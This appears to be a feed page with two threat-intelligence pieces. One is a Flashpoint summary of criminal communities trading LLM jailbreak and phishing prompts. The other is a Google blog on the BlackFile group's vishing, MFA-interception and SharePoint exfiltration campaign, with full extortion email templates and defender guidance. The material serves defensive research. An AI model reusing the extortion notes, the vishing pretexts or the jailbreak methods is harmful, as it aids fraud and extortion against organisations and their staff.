Across April, discussions tied to malicious or unrestricted LLM usage focused heavily on jailbreak methods, prompt-sharing workflows, and access to alternative models perceived as less restricted than mainstream platforms.

The top observed malicious LLMs mentioned within Flashpoint Collections in April 2026. (Source: Flashpoint)

Flashpoint analysts observed a significant increase in discussions related to VeniceAI, driven in part by newly created Reddit and Discord communities dedicated to the platform. The increase highlights continued interest in models that users believe operate with fewer safeguards or moderation controls than services like ChatGPT or Gemini.

The activity centers on usability and output reliability.

Posts reference:

  • jailbreak prompts designed to bypass safeguards
  • phishing and fraud-oriented prompt collections
  • step-by-step instructions for generating specific outputs
  • requests for prompts tailored to impersonation or social engineering workflows

Many of these prompts are shared in collections that include updates, revisions, or support channels. Users exchange feedback when prompts stop working, outputs degrade, or platforms introduce new restrictions. Updated versions frequently follow within short timeframes.

This type of activity reinforces how prompt engineering has developed into its own service layer across illicit communities. The focus is not limited to the underlying model itself, but to the ability to generate repeatable outputs that can be applied directly within fraud, phishing, or impersonation workflows.

Across April, the same prompt structures and jailbreak methods appeared repeatedly across multiple sources, often with only small adjustments tied to platform or target.

The emphasis remains on accessibility, portability, and ease of use rather than custom model development.

Operational Patterns and What Holds Across Sources

Across April, the same behaviors continued to appear across different environments with only minor variation.

Prompt libraries, jailbreak methods, phishing workflows, and identity verification bypass techniques circulated across Telegram channels, forums, Discord communities, and paste sites. The wording changed slightly between platforms, though the underlying structure and outputs remained consistent.

This reuse is visible in how content moves between sources. A jailbreak prompt shared in one channel appears elsewhere with revised wording or additional instructions. A phishing workflow posted to a forum is copied into a paste site and redistributed through Telegram. Users request modifications, test outputs, and repost updated versions when restrictions change or methods stop working.

That cycle appeared repeatedly throughout April.

The activity also showed strong feedback loops tied to usability. Discussions focused heavily on which prompts generated reliable outputs, which models produced fewer restrictions, and which workflows required the least adjustment before use.

Across monitored sources, the same operational priorities appeared consistently:

  • reliability of outputs
  • ease of reuse
  • ability to bypass safeguards
  • compatibility with existing fraud and impersonation workflows

Looking across April activity reinforces how AI-enabled methods continue to mature through repetition, iteration, and distribution across connected communities.

What Security Teams Should Take Away

The activity tracked in this report shows how artificial intelligence is being used in environments where techniques are developed, tested, and shared before they surface elsewhere.

Across these communities, methods tied to fraud, impersonation, and access are reused, adjusted, and circulated in forms that others can apply directly. That process does not require significant change to move from discussion into use.

For security teams, the priority is maintaining visibility into how these methods are evolving and where they are being applied. That visibility supports earlier detection, more focused response, and a clearer understanding of which techniques are actively in circulation.

Monitoring these sources provides that context. It connects observed activity to the methods behind it and helps teams track how those methods develop over time.

If you want to see how this activity maps to your environment, request a demo.

Request a demo today.

The post AI Threat Report: How Artificial Intelligence Is Used Across Illicit Communities appeared first on Flashpoint.

Welcome to BlackFile: Inside a Vishing Extortion Operation

15 May 2026 at 16:00

Written by: Austin Larsen, Tyler McLellan, Genevieve Stark, Dan Ebreo


IntroductionΒ 

Google Threat Intelligence Group (GTIG) has continued to track an expansive extortion campaign by UNC6671, a threat actor operating under the "BlackFile" brand, that targets organizations via sophisticated voice phishing (vishing) and single sign-on (SSO) compromise. By leveraging adversary-in-the-middle (AiTM) techniques to bypass traditional perimeter defenses and multi-factor authentication (MFA), UNC6671 gains deep access to cloud environments. The group primarily targets Microsoft 365 and Okta infrastructure, leveraging Python and PowerShell scripts to programmatically exfiltrate sensitive corporate data for subsequent extortion attempts. This post details UNC6671’s attack lifecycle and provides defenders with actionable guidance to detect and mitigate these identity-centric threats.

Since emerging in early 2026, UNC6671 has maintained a high operational cadence. GTIG assesses that the group has targeted dozens of organizations across North America, Australia, and the UK.

GTIG previously highlighted UNC6671 as a distinct cluster in aΒ prior report detailing similar SaaS data-theft techniques utilized by ShinyHunters (UNC6240). While UNC6671 has co-opted the ShinyHunters brand in at least one instance to inject artificial credibility into their threats, GTIG assesses that the operations are independent. This distinction is supported by UNC6671's use of separate TOX communication channels, unique domain registration patterns, and the launch of a dedicated "BlackFile" data leak site (DLS).

These compromises are not the result of a security vulnerability in vendor products or infrastructure. Instead, this campaign continues to highlight the effectiveness of social engineering and underscores the critical importance of organizations moving toward phishing-resistant MFA to protect their SaaS and identity platforms.

Initial Access

UNC6671 initial access operations rely on high-volume voice phishing (vishing), often characterized by meticulous social engineering tactics, synchronized with real-time credential harvesting. These vishing calls are typically made by "callers" hired by the threat actor.Β 

IT Deployment Pretext

The callers often call targeted employees' personal cellular phones to bypass security tooling and move the victim away from standard support channels. They typically masquerade as internal IT or help desk personnel, citing a mandatory migration to passkeys or a required multi-factor authentication (MFA) update. This pretext justifies directing the victim to a credential harvesting site and provides a logical cover for any subsequent security alerts generated during the compromise. UNC6671 has shifted from unique, organization-tailored credential harvesting domains to a subdomain-based model. These domains are typically registered with Tucows. Recent campaigns have used subdomains explicitly referencing "passkey" or "enrollment" themes to enhance the legitimacy of the help desk pretext.

  • <organization>.enrollms[.]com
  • <organization>.passkeyms[.]com
  • <organization>.setupsso[.]com

Real-Time MFA Interception

The vishing call functions as a live adversary-in-the-middle (AitM) attack. The process follows a rapid, procedural lifecycle:

  • Redirection: The victim is directed to a lookalike subdomain mirroring the organization's single sign-on (SSO) portal.

  • Credential Capture: As the victim inputs their username and password, the threat actor captures these in real-time and immediately submits them to the legitimate SSO provider.

  • MFA Bypass: When the legitimate portal issues an MFA challenge (Push, SMS, or TOTP), the victimβ€”believing they are completing a setup stepβ€”provides the code or approval to the threat actor.

  • Device Registration: Upon gaining access, the threat actor immediately navigates to the user's security settings to register a new, attacker-controlled MFA device to ensure persistence.

The speed of this execution ensures the threat actor can establish a permanent foothold before the victim or the organization's Security Operations Center (SOC) can identify the anomaly.

Data Theft

Following successful authentication, UNC6671 leverages SSO access to move laterally across the victim's SaaS applications to enable data theft operations. The threat actors appear to be focused on targeting Microsoft 365 and Okta environments, using compromised accounts to access SharePoint, OneDrive, and other connected SaaS applications such as Zendesk and Salesforce. In several instances, the actors specifically queried internal search functions for string literals such as "confidential" and "SSN" to prioritize theft of perceived high-value data.

Programmatic Data Exfiltration

Upon establishing persistence, UNC6671 transitions from interactive browser-based reconnaissance to automated exfiltration. In multiple engagements, we observed the use of scripts to harvest high-value data from SharePoint and OneDrive repositories.

In addition to relying on methods that triggered standard FileDownloaded events, the threat actor has also used less conspicuous approaches. These include the threat actor’s use of formal APIs, such as Microsoft Graph, as well asΒ  the python-requests library and PowerShell to issue direct HTTP GET requests against document resource URLs. Notably, by repurposing valid session cookies (e.g., FedAuth) captured during the initial vishing phase, the actor has been able to "stream" file content directly to attacker-controlled infrastructure.

In these cases, the request mimics a standard web client fetch rather than a formal "Download" command. As a result, the activity is frequently recorded as a FileAccessed event rather than FileDownloaded. This 'direct fetch' method naturally blends into routine traffic, which may bypass detection in many Security Operations Centers (SOCs) that prioritize FileDownloaded events and treat FileAccessed as benign.

Forensic Artifacts and Scripting

Analysis of Microsoft 365 Unified Audit Log (UAL) telemetry revealed several consistent forensic indicators of UNC6671 activity, including clear evidence of scripted exfiltration. Most notably, the threat actor frequently showed User-Agent mismatches; while they spoofed the ClientAppId for "Microsoft Office" to bypass basic conditional access filters, the recorded UserAgent strings identified scripting engines such as python-requests/2.28.1 or WindowsPowerShell/5.1. This discrepancy suggests that access was driven by automated scripts rather than human interaction with the SharePoint user interface. Additionally, these access attempts consistently originated from non-standard infrastructure, such as commercial VPN exit nodes and hosting providers.

{
  "CreationTime": "2026-02-24T14:36:15",
  "Operation": "FileDownloaded",
  "Workload": "SharePoint",
  "ClientIP": "179.43.185.226", 
  "UserId": "victim.user@organization.com",
  "UserAgent": "python-requests/2.28.1",
  "ApplicationDisplayName": "Microsoft Office",
  "IsManagedDevice": false,
  "SourceFileName": "2382_REDACTED_MSA_v3.docx",
  "SourceRelativeUrl": "Shared Documents/Legal/MasterMSA/Archive",
  "SiteUrl": "https://organization.sharepoint.com/sites/Legal_Archive/",
  "AppAccessContext": {
    "ClientAppId": "d3590ed6-52b3-4102-aeff-aad2292ab01c",
    "ClientAppName": "Microsoft Office",
    "TokenIssuedAtTime": "1601-01-01T00:00:00"
  }
}

Figure 1: FileDownloaded event observed in early UNC6671 intrusions

{
  "CreationTime": "2026-03-18T20:06:41",
  "Operation": "FileAccessed",
  "Workload": "SharePoint",
  "UserId": "victim.user@company.com",
  "ClientIP": "179.43.185.226", 
  "UserAgent": "python-requests/2.28.1",
  "ApplicationDisplayName": "python-requests",
  "IsManagedDevice": false,
  "SourceRelativeUrl": "Shared Documents/Data Analytics/Power BI Version History",
  "SourceFileName": "Weekly Production Report.pbix",
  "SiteUrl": "https://company.sharepoint.com/sites/ProductionOps/",
  "AppAccessContext": {
    "ClientAppName": "python-requests",
    "CorrelationId": "b94b01a2-2019-c000-2262-5ff1d0ff6cc8"
  }
}

Figure 2: FileAccessed event from later UNC6671 intrusions

The speed and scale of UNC6671’s data exfiltration also reflects the automated nature of these scripts, which allows the threat actors to exfiltrate massive volumes of data at high speeds. In one case, the threat actor used their Python script from a remote IP to access and download over a million individual files from a victim's SharePoint and OneDrive environments. In another case, the threat actor rapidly iterated through tens of thousands of SharePoint file interactions.

Extortion

UNC6671 conducts highly targeted extortion campaigns, beginning with unbranded ransom notes sent from programmatically generated consumer email accounts. Once a victim engages via the unique, encrypted communication channel (such as Tox or Session) provided by the threat actor in the initial ransom note, the operators identify themselves under the "BlackFile" brand. While the operators typically open negotiations with initial demands in the millions of dollars, they often pivot to low six-figure demands when met with active engagement. Notably, while the initial emails typically do not contain errors, at least some follow up emails have contained mistakes suggesting that those are human generated.

In cases where the operator is met with silence or resistance, the group aggressively escalates pressure. During a recent incident, after the victim was unresponsive, UNC6671 pivoted to an aggressive spam campaign. Using dozens of Gmail accounts with randomly generated usernames, the threat actor flooded employee mailboxes with messages before automated restrictions kicked in based on their sending behavior and their accounts were restricted. We have also observed these threat actors sending threatening voicemails to C-suite executives and, in severe cases, utilizing swatting tactics against company personnel.

Subject: [COMPANY NAME] DATA BREACH 72 HOURS TO CONTACT US
From: [pseudorandom_alphanumeric_string]@gmail.com

Hello [Company Name] Executives and HR,

We have managed to export ~[X] TB of data from your network due to your terrible security practices and negligent data storing practices.

Here is a brief overview of data exported from your network:

  1. [X]+ GB of internal company files (SharePoint & OneDrive) containing confidential business processes, NDAs, project cost estimates, subcontractor contracts, and HR records.

  2. Tens of thousands of emails from executive mailboxes, including confidential documents.

  3. Complete CRM and support ticket exports (Salesforce & Zendesk) containing hundreds of thousands of customer records, PII, billing details, and communication logs.

  4. Complete corporate directory (Entra) dumps including employee names, mobile numbers, job titles, and hierarchy.

  5. ~[X] ServiceNow IT infrastructure records (computers, servers, cloud resources).

You have exactly 72 hours to contact the [Tox / Session] ID provided below. If you fail to contact the ID provided by us within the timeframe stated, we will be forced to publish your data to the public. We will also be forced to contact each company you work with via the employee team contact phone numbers and email addresses provided and explain how [Company Name] has terrible security protocols and does not care about its customers.

We are willing to engage in good faith negotiation terms. Upon contacting us, a full list of all data exported from your network will be sent to you for review. You will be able to pick up to 3 files to confirm and verify we have what we are claiming.

[Tox / Session] ID: [Unique Alphanumeric String]

Silence may not always be wise in situations like this. We will not be ignored. Make the right choice and cooperate with us so this can be a learning experience for you.

Figure 3: Generalized example initial unbranded extortion note from UNC6671

Subject: [COMPANY NAME] DATA BREACH 72 HOURS TO CONTACT US
From: [pseudorandom_alphanumeric_string]@gmail.com

Dearest executive,

You have picked to ignore the first deadline to contact us. That is not smart do not ignore us it will only make things worse. We are BlackFile. Do not play games with us. We are giving a final deadline of 72 hours to contact us so we can reach an agreement.

We copied over [X] TB+ of data from your SharePoint & M365 instance (legal documents, operational documents, client documents, sales documents, development documents, etc) over [X]gb of Salesforce data, full ZenDesk support ticket export for [X]+ customers, ALL ticket history including old and new tickets and their contents. Total taken from your network is over [X]TB+

Do not be alarmed as you can secure the proteciton of your data by choosing to work with us. Nothing taken from your network has been disclosed to the public or shared with third parties as of now.

Reach out to us on session to receive all details and evidense that we accessed your network. We will use Session to communicate with you. You can get Session by visiting getsession(.)org

Reach out to the following ID using Session: [Unique Session ID]

Do not reply to this email. Instead alert the rest of your HR and SOC/IT Security Team. We give you a final deadline of 72 hours to confirm reciept that you received this email by contacting us on Session.

If you fail to contact us a second time then a majority of the emails taken from your network will receive a notification from us explaining you failed to come to an agreement with us to protect your customers PII and other sensitive information. Additionally we will message journalists about this breach and your failure to come to a resolution with us before finally uploading all data taken from you to our blog for the public.

Do not let a data recovery company tell you not to negotate us we are BlackFile and we do not play games. The data we took from you can seriously damage your reputation if released is it really worth having that happen over ignoring us?

Blackfile

Figure 4: Generalized example follow up extortion email which included branding not present in initial messages

Evolution of Ransom Notes

Throughout their operations in early 2026, UNC6671's ransom notes exhibited an evolution in formatting, branding, and communication methods. Initially, the threat actors used highly aggressive, short-term deadlines, often giving early victims generic 24 or 48 hour windows to respond. This appeared to become more standardized in late January when they gave subsequent targets a strict 72-hour deadline. Their email subject lines also evolved into a formalized, all-caps structure: [COMPANY NAME] DATA BREACH 72 HOURS TO CONTACT US.

During this same period, the group’s identity and preferred communication channels shifted. Early extortion emails were unbranded, with the actors demanding contact via Tox (a peer-to-peer instant messaging protocol). By February 2026, the group formally adopted the "BlackFile" moniker and transitioned their communication demands exclusively to Session (a decentralized, privacy-focused messenger), providing victims with Session IDs and client download instructions. Additionally, while early extortion notes were sent from external emails that could easily be flagged by spam filters or ignored, since at least March 2026, UNC6671 has leveraged hijacked internal corporate email and Microsoft Teams accounts.Β 

The BlackFile Data Leak Site (DLS)

The threat actors launched the BlackFile Data Leak Site (DLS) on February 6, 2026, claiming to operate as "security researchers." Despite maintaining a dedicated DLS, the group's approach to data exposure deviates significantly from the maximum-publicity, high-noise model employed by other actors. UNC6671 does not publicly advertise their leak site or attempt to index it for search engines. Furthermore, the group has typically only leaked limited file samples and directory listings rather than full datasets; to date, GTIG has not observed the actor leak victim data in full.

BlackFile DLS

Figure 5: BlackFile DLS

BlackFile DLS Deletion Process

Figure 6: BlackFile DLS Deletion Process

Notably, the BlackFile DLS site went offline in late April 2026, but briefly came back online on May 11, 2026 to share the below message before shutting down again. In this message, the threat actor stated "BlackFile is shutting down… under this name." As of the time of publication, the DLS site is inaccessible.

BlackFile DLS Shutdown Announcement

Figure 7: BlackFile DLS Shutdown Announcement

Remediation and Hardening

GTIG recommends the following mitigations and hunting strategies:

  • Deploy Credential Guarding: Configure environment-specific protections to catch credential submission at the point of impact. In Google Workspace, enable Password Alert to monitor for corporate password hashes being entered into unauthorized domains. For Microsoft environments, leverage Microsoft Defender's Credential Protection and SmartScreen to intercept submissions on known phishing or low-reputation sites. These automated technical controls act as a final fail-safe, triggering immediate password resets or security alerts when a user inadvertently interacts with a malicious page.

  • Implement Phishing-Resistant MFA: Transition away from SMS-based or push-notification MFA. Implement FIDO2-compliant security keys or passkeys, which are resistant to the adversary-in-the-middle (AiTM) and vishing tactics employed by UNC6671.

  • Monitor IdP Logs: Review identity provider logs for system.multifactor.factor.setup events that are immediately preceded by user.authentication.auth_via_mfa failures or "Abandoned" challenges.

  • Correlate Infrastructure: Alert on authentication attempts originating from known commercial VPNs or hosting providers that are abnormal for the user's typical geographic location.

  • Audit SaaS API Activity: Monitor Microsoft 365, SharePoint, and Salesforce audit logs for anomalous, high-volume file downloads (FileDownloaded or FileAccessed events) originating from generic scripting user agents (e.g., PowerShell, Python).

  • Monitor User-Agents: Monitor for specific IdP SDK User-Agents on devices not previously associated with a user's profile.

  • Re-Evaluate "Access" Severity: Security Operations Centers (SOCs) should treat FileAccessed events with the same criticality as FileDownloaded when the User-Agent identifies it as a programming library (Python, Go, etc.) or a command-line tool.

  • Audit for Direct File Streaming: Monitor for FileAccessed logs where the AppAccessContext indicates a headless client or where the volume of "Accessed" files in a short window exceeds human browsing capability.

Outlook and Implications

The recent shutdown of the BlackFile data leak site (DLS) accompanied by the actors' own declaration that they are shutting down "under this name" signals a possible transition phase rather than a permanent cessation of their threat activity. Historical precedents across the extortion ecosystem demonstrate that major threat clusters commonly rebrand or disperse their operations following disruption or voluntary shutdowns. These events can serve several strategic functions: evading law enforcement or competitor scrutiny, quietly resolving pending extortion cases, or preparing to pivot to a more viable brand while simultaneously also allowing time for the threat actors to retool and/or set up new infrastructure. Even if the BlackFile brand is permanently retired, the techniques leveraged by UNC6671, specifically their focus on data theft from cloud and SaaS environments, represent a highly successful trend in the cyber crime threat landscape that we also highlighted in the Google Cloud H1 2026 Cloud Threat Horizons Report. Organizations can review our prior blog post with actionable hardening, logging, and detection recommendations to help protect against these threats.

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have provided indicators of compromise (IOCs) in a free GTI Collection for registered users. At the time of publication, identified phishing domains have been added to Google Safe Browsing.

While this collection provides a comprehensive list of IOCs, defenders should note that the majority of identified IP addresses are commercial VPN nodes, and actual source IPs tend to vary as the actor continuously cycles through new infrastructure. Furthermore, the domains are often stood up and used within minutes of registration; as such, they are provided primarily as examples of past naming conventions and usage patterns rather than as a primary mechanism for real-time blocking.

Google Security Operations (SecOps)

Google SecOps customers have access to broad category rules under the Okta and O365 rule packs that detect the behaviors outlined in this report. The activity discussed in the blog post is detected in Google SecOps under the following rule names:

  • Okta Admin Console Access Failure

  • Okta Suspicious Actions from Anonymized IP

  • O365 SharePoint Bulk File Access or Download via PowerShell

  • O365 SharePoint High Volume File Access Events

  • O365 Sharepoint Query for Proprietary or Privileged Information

❌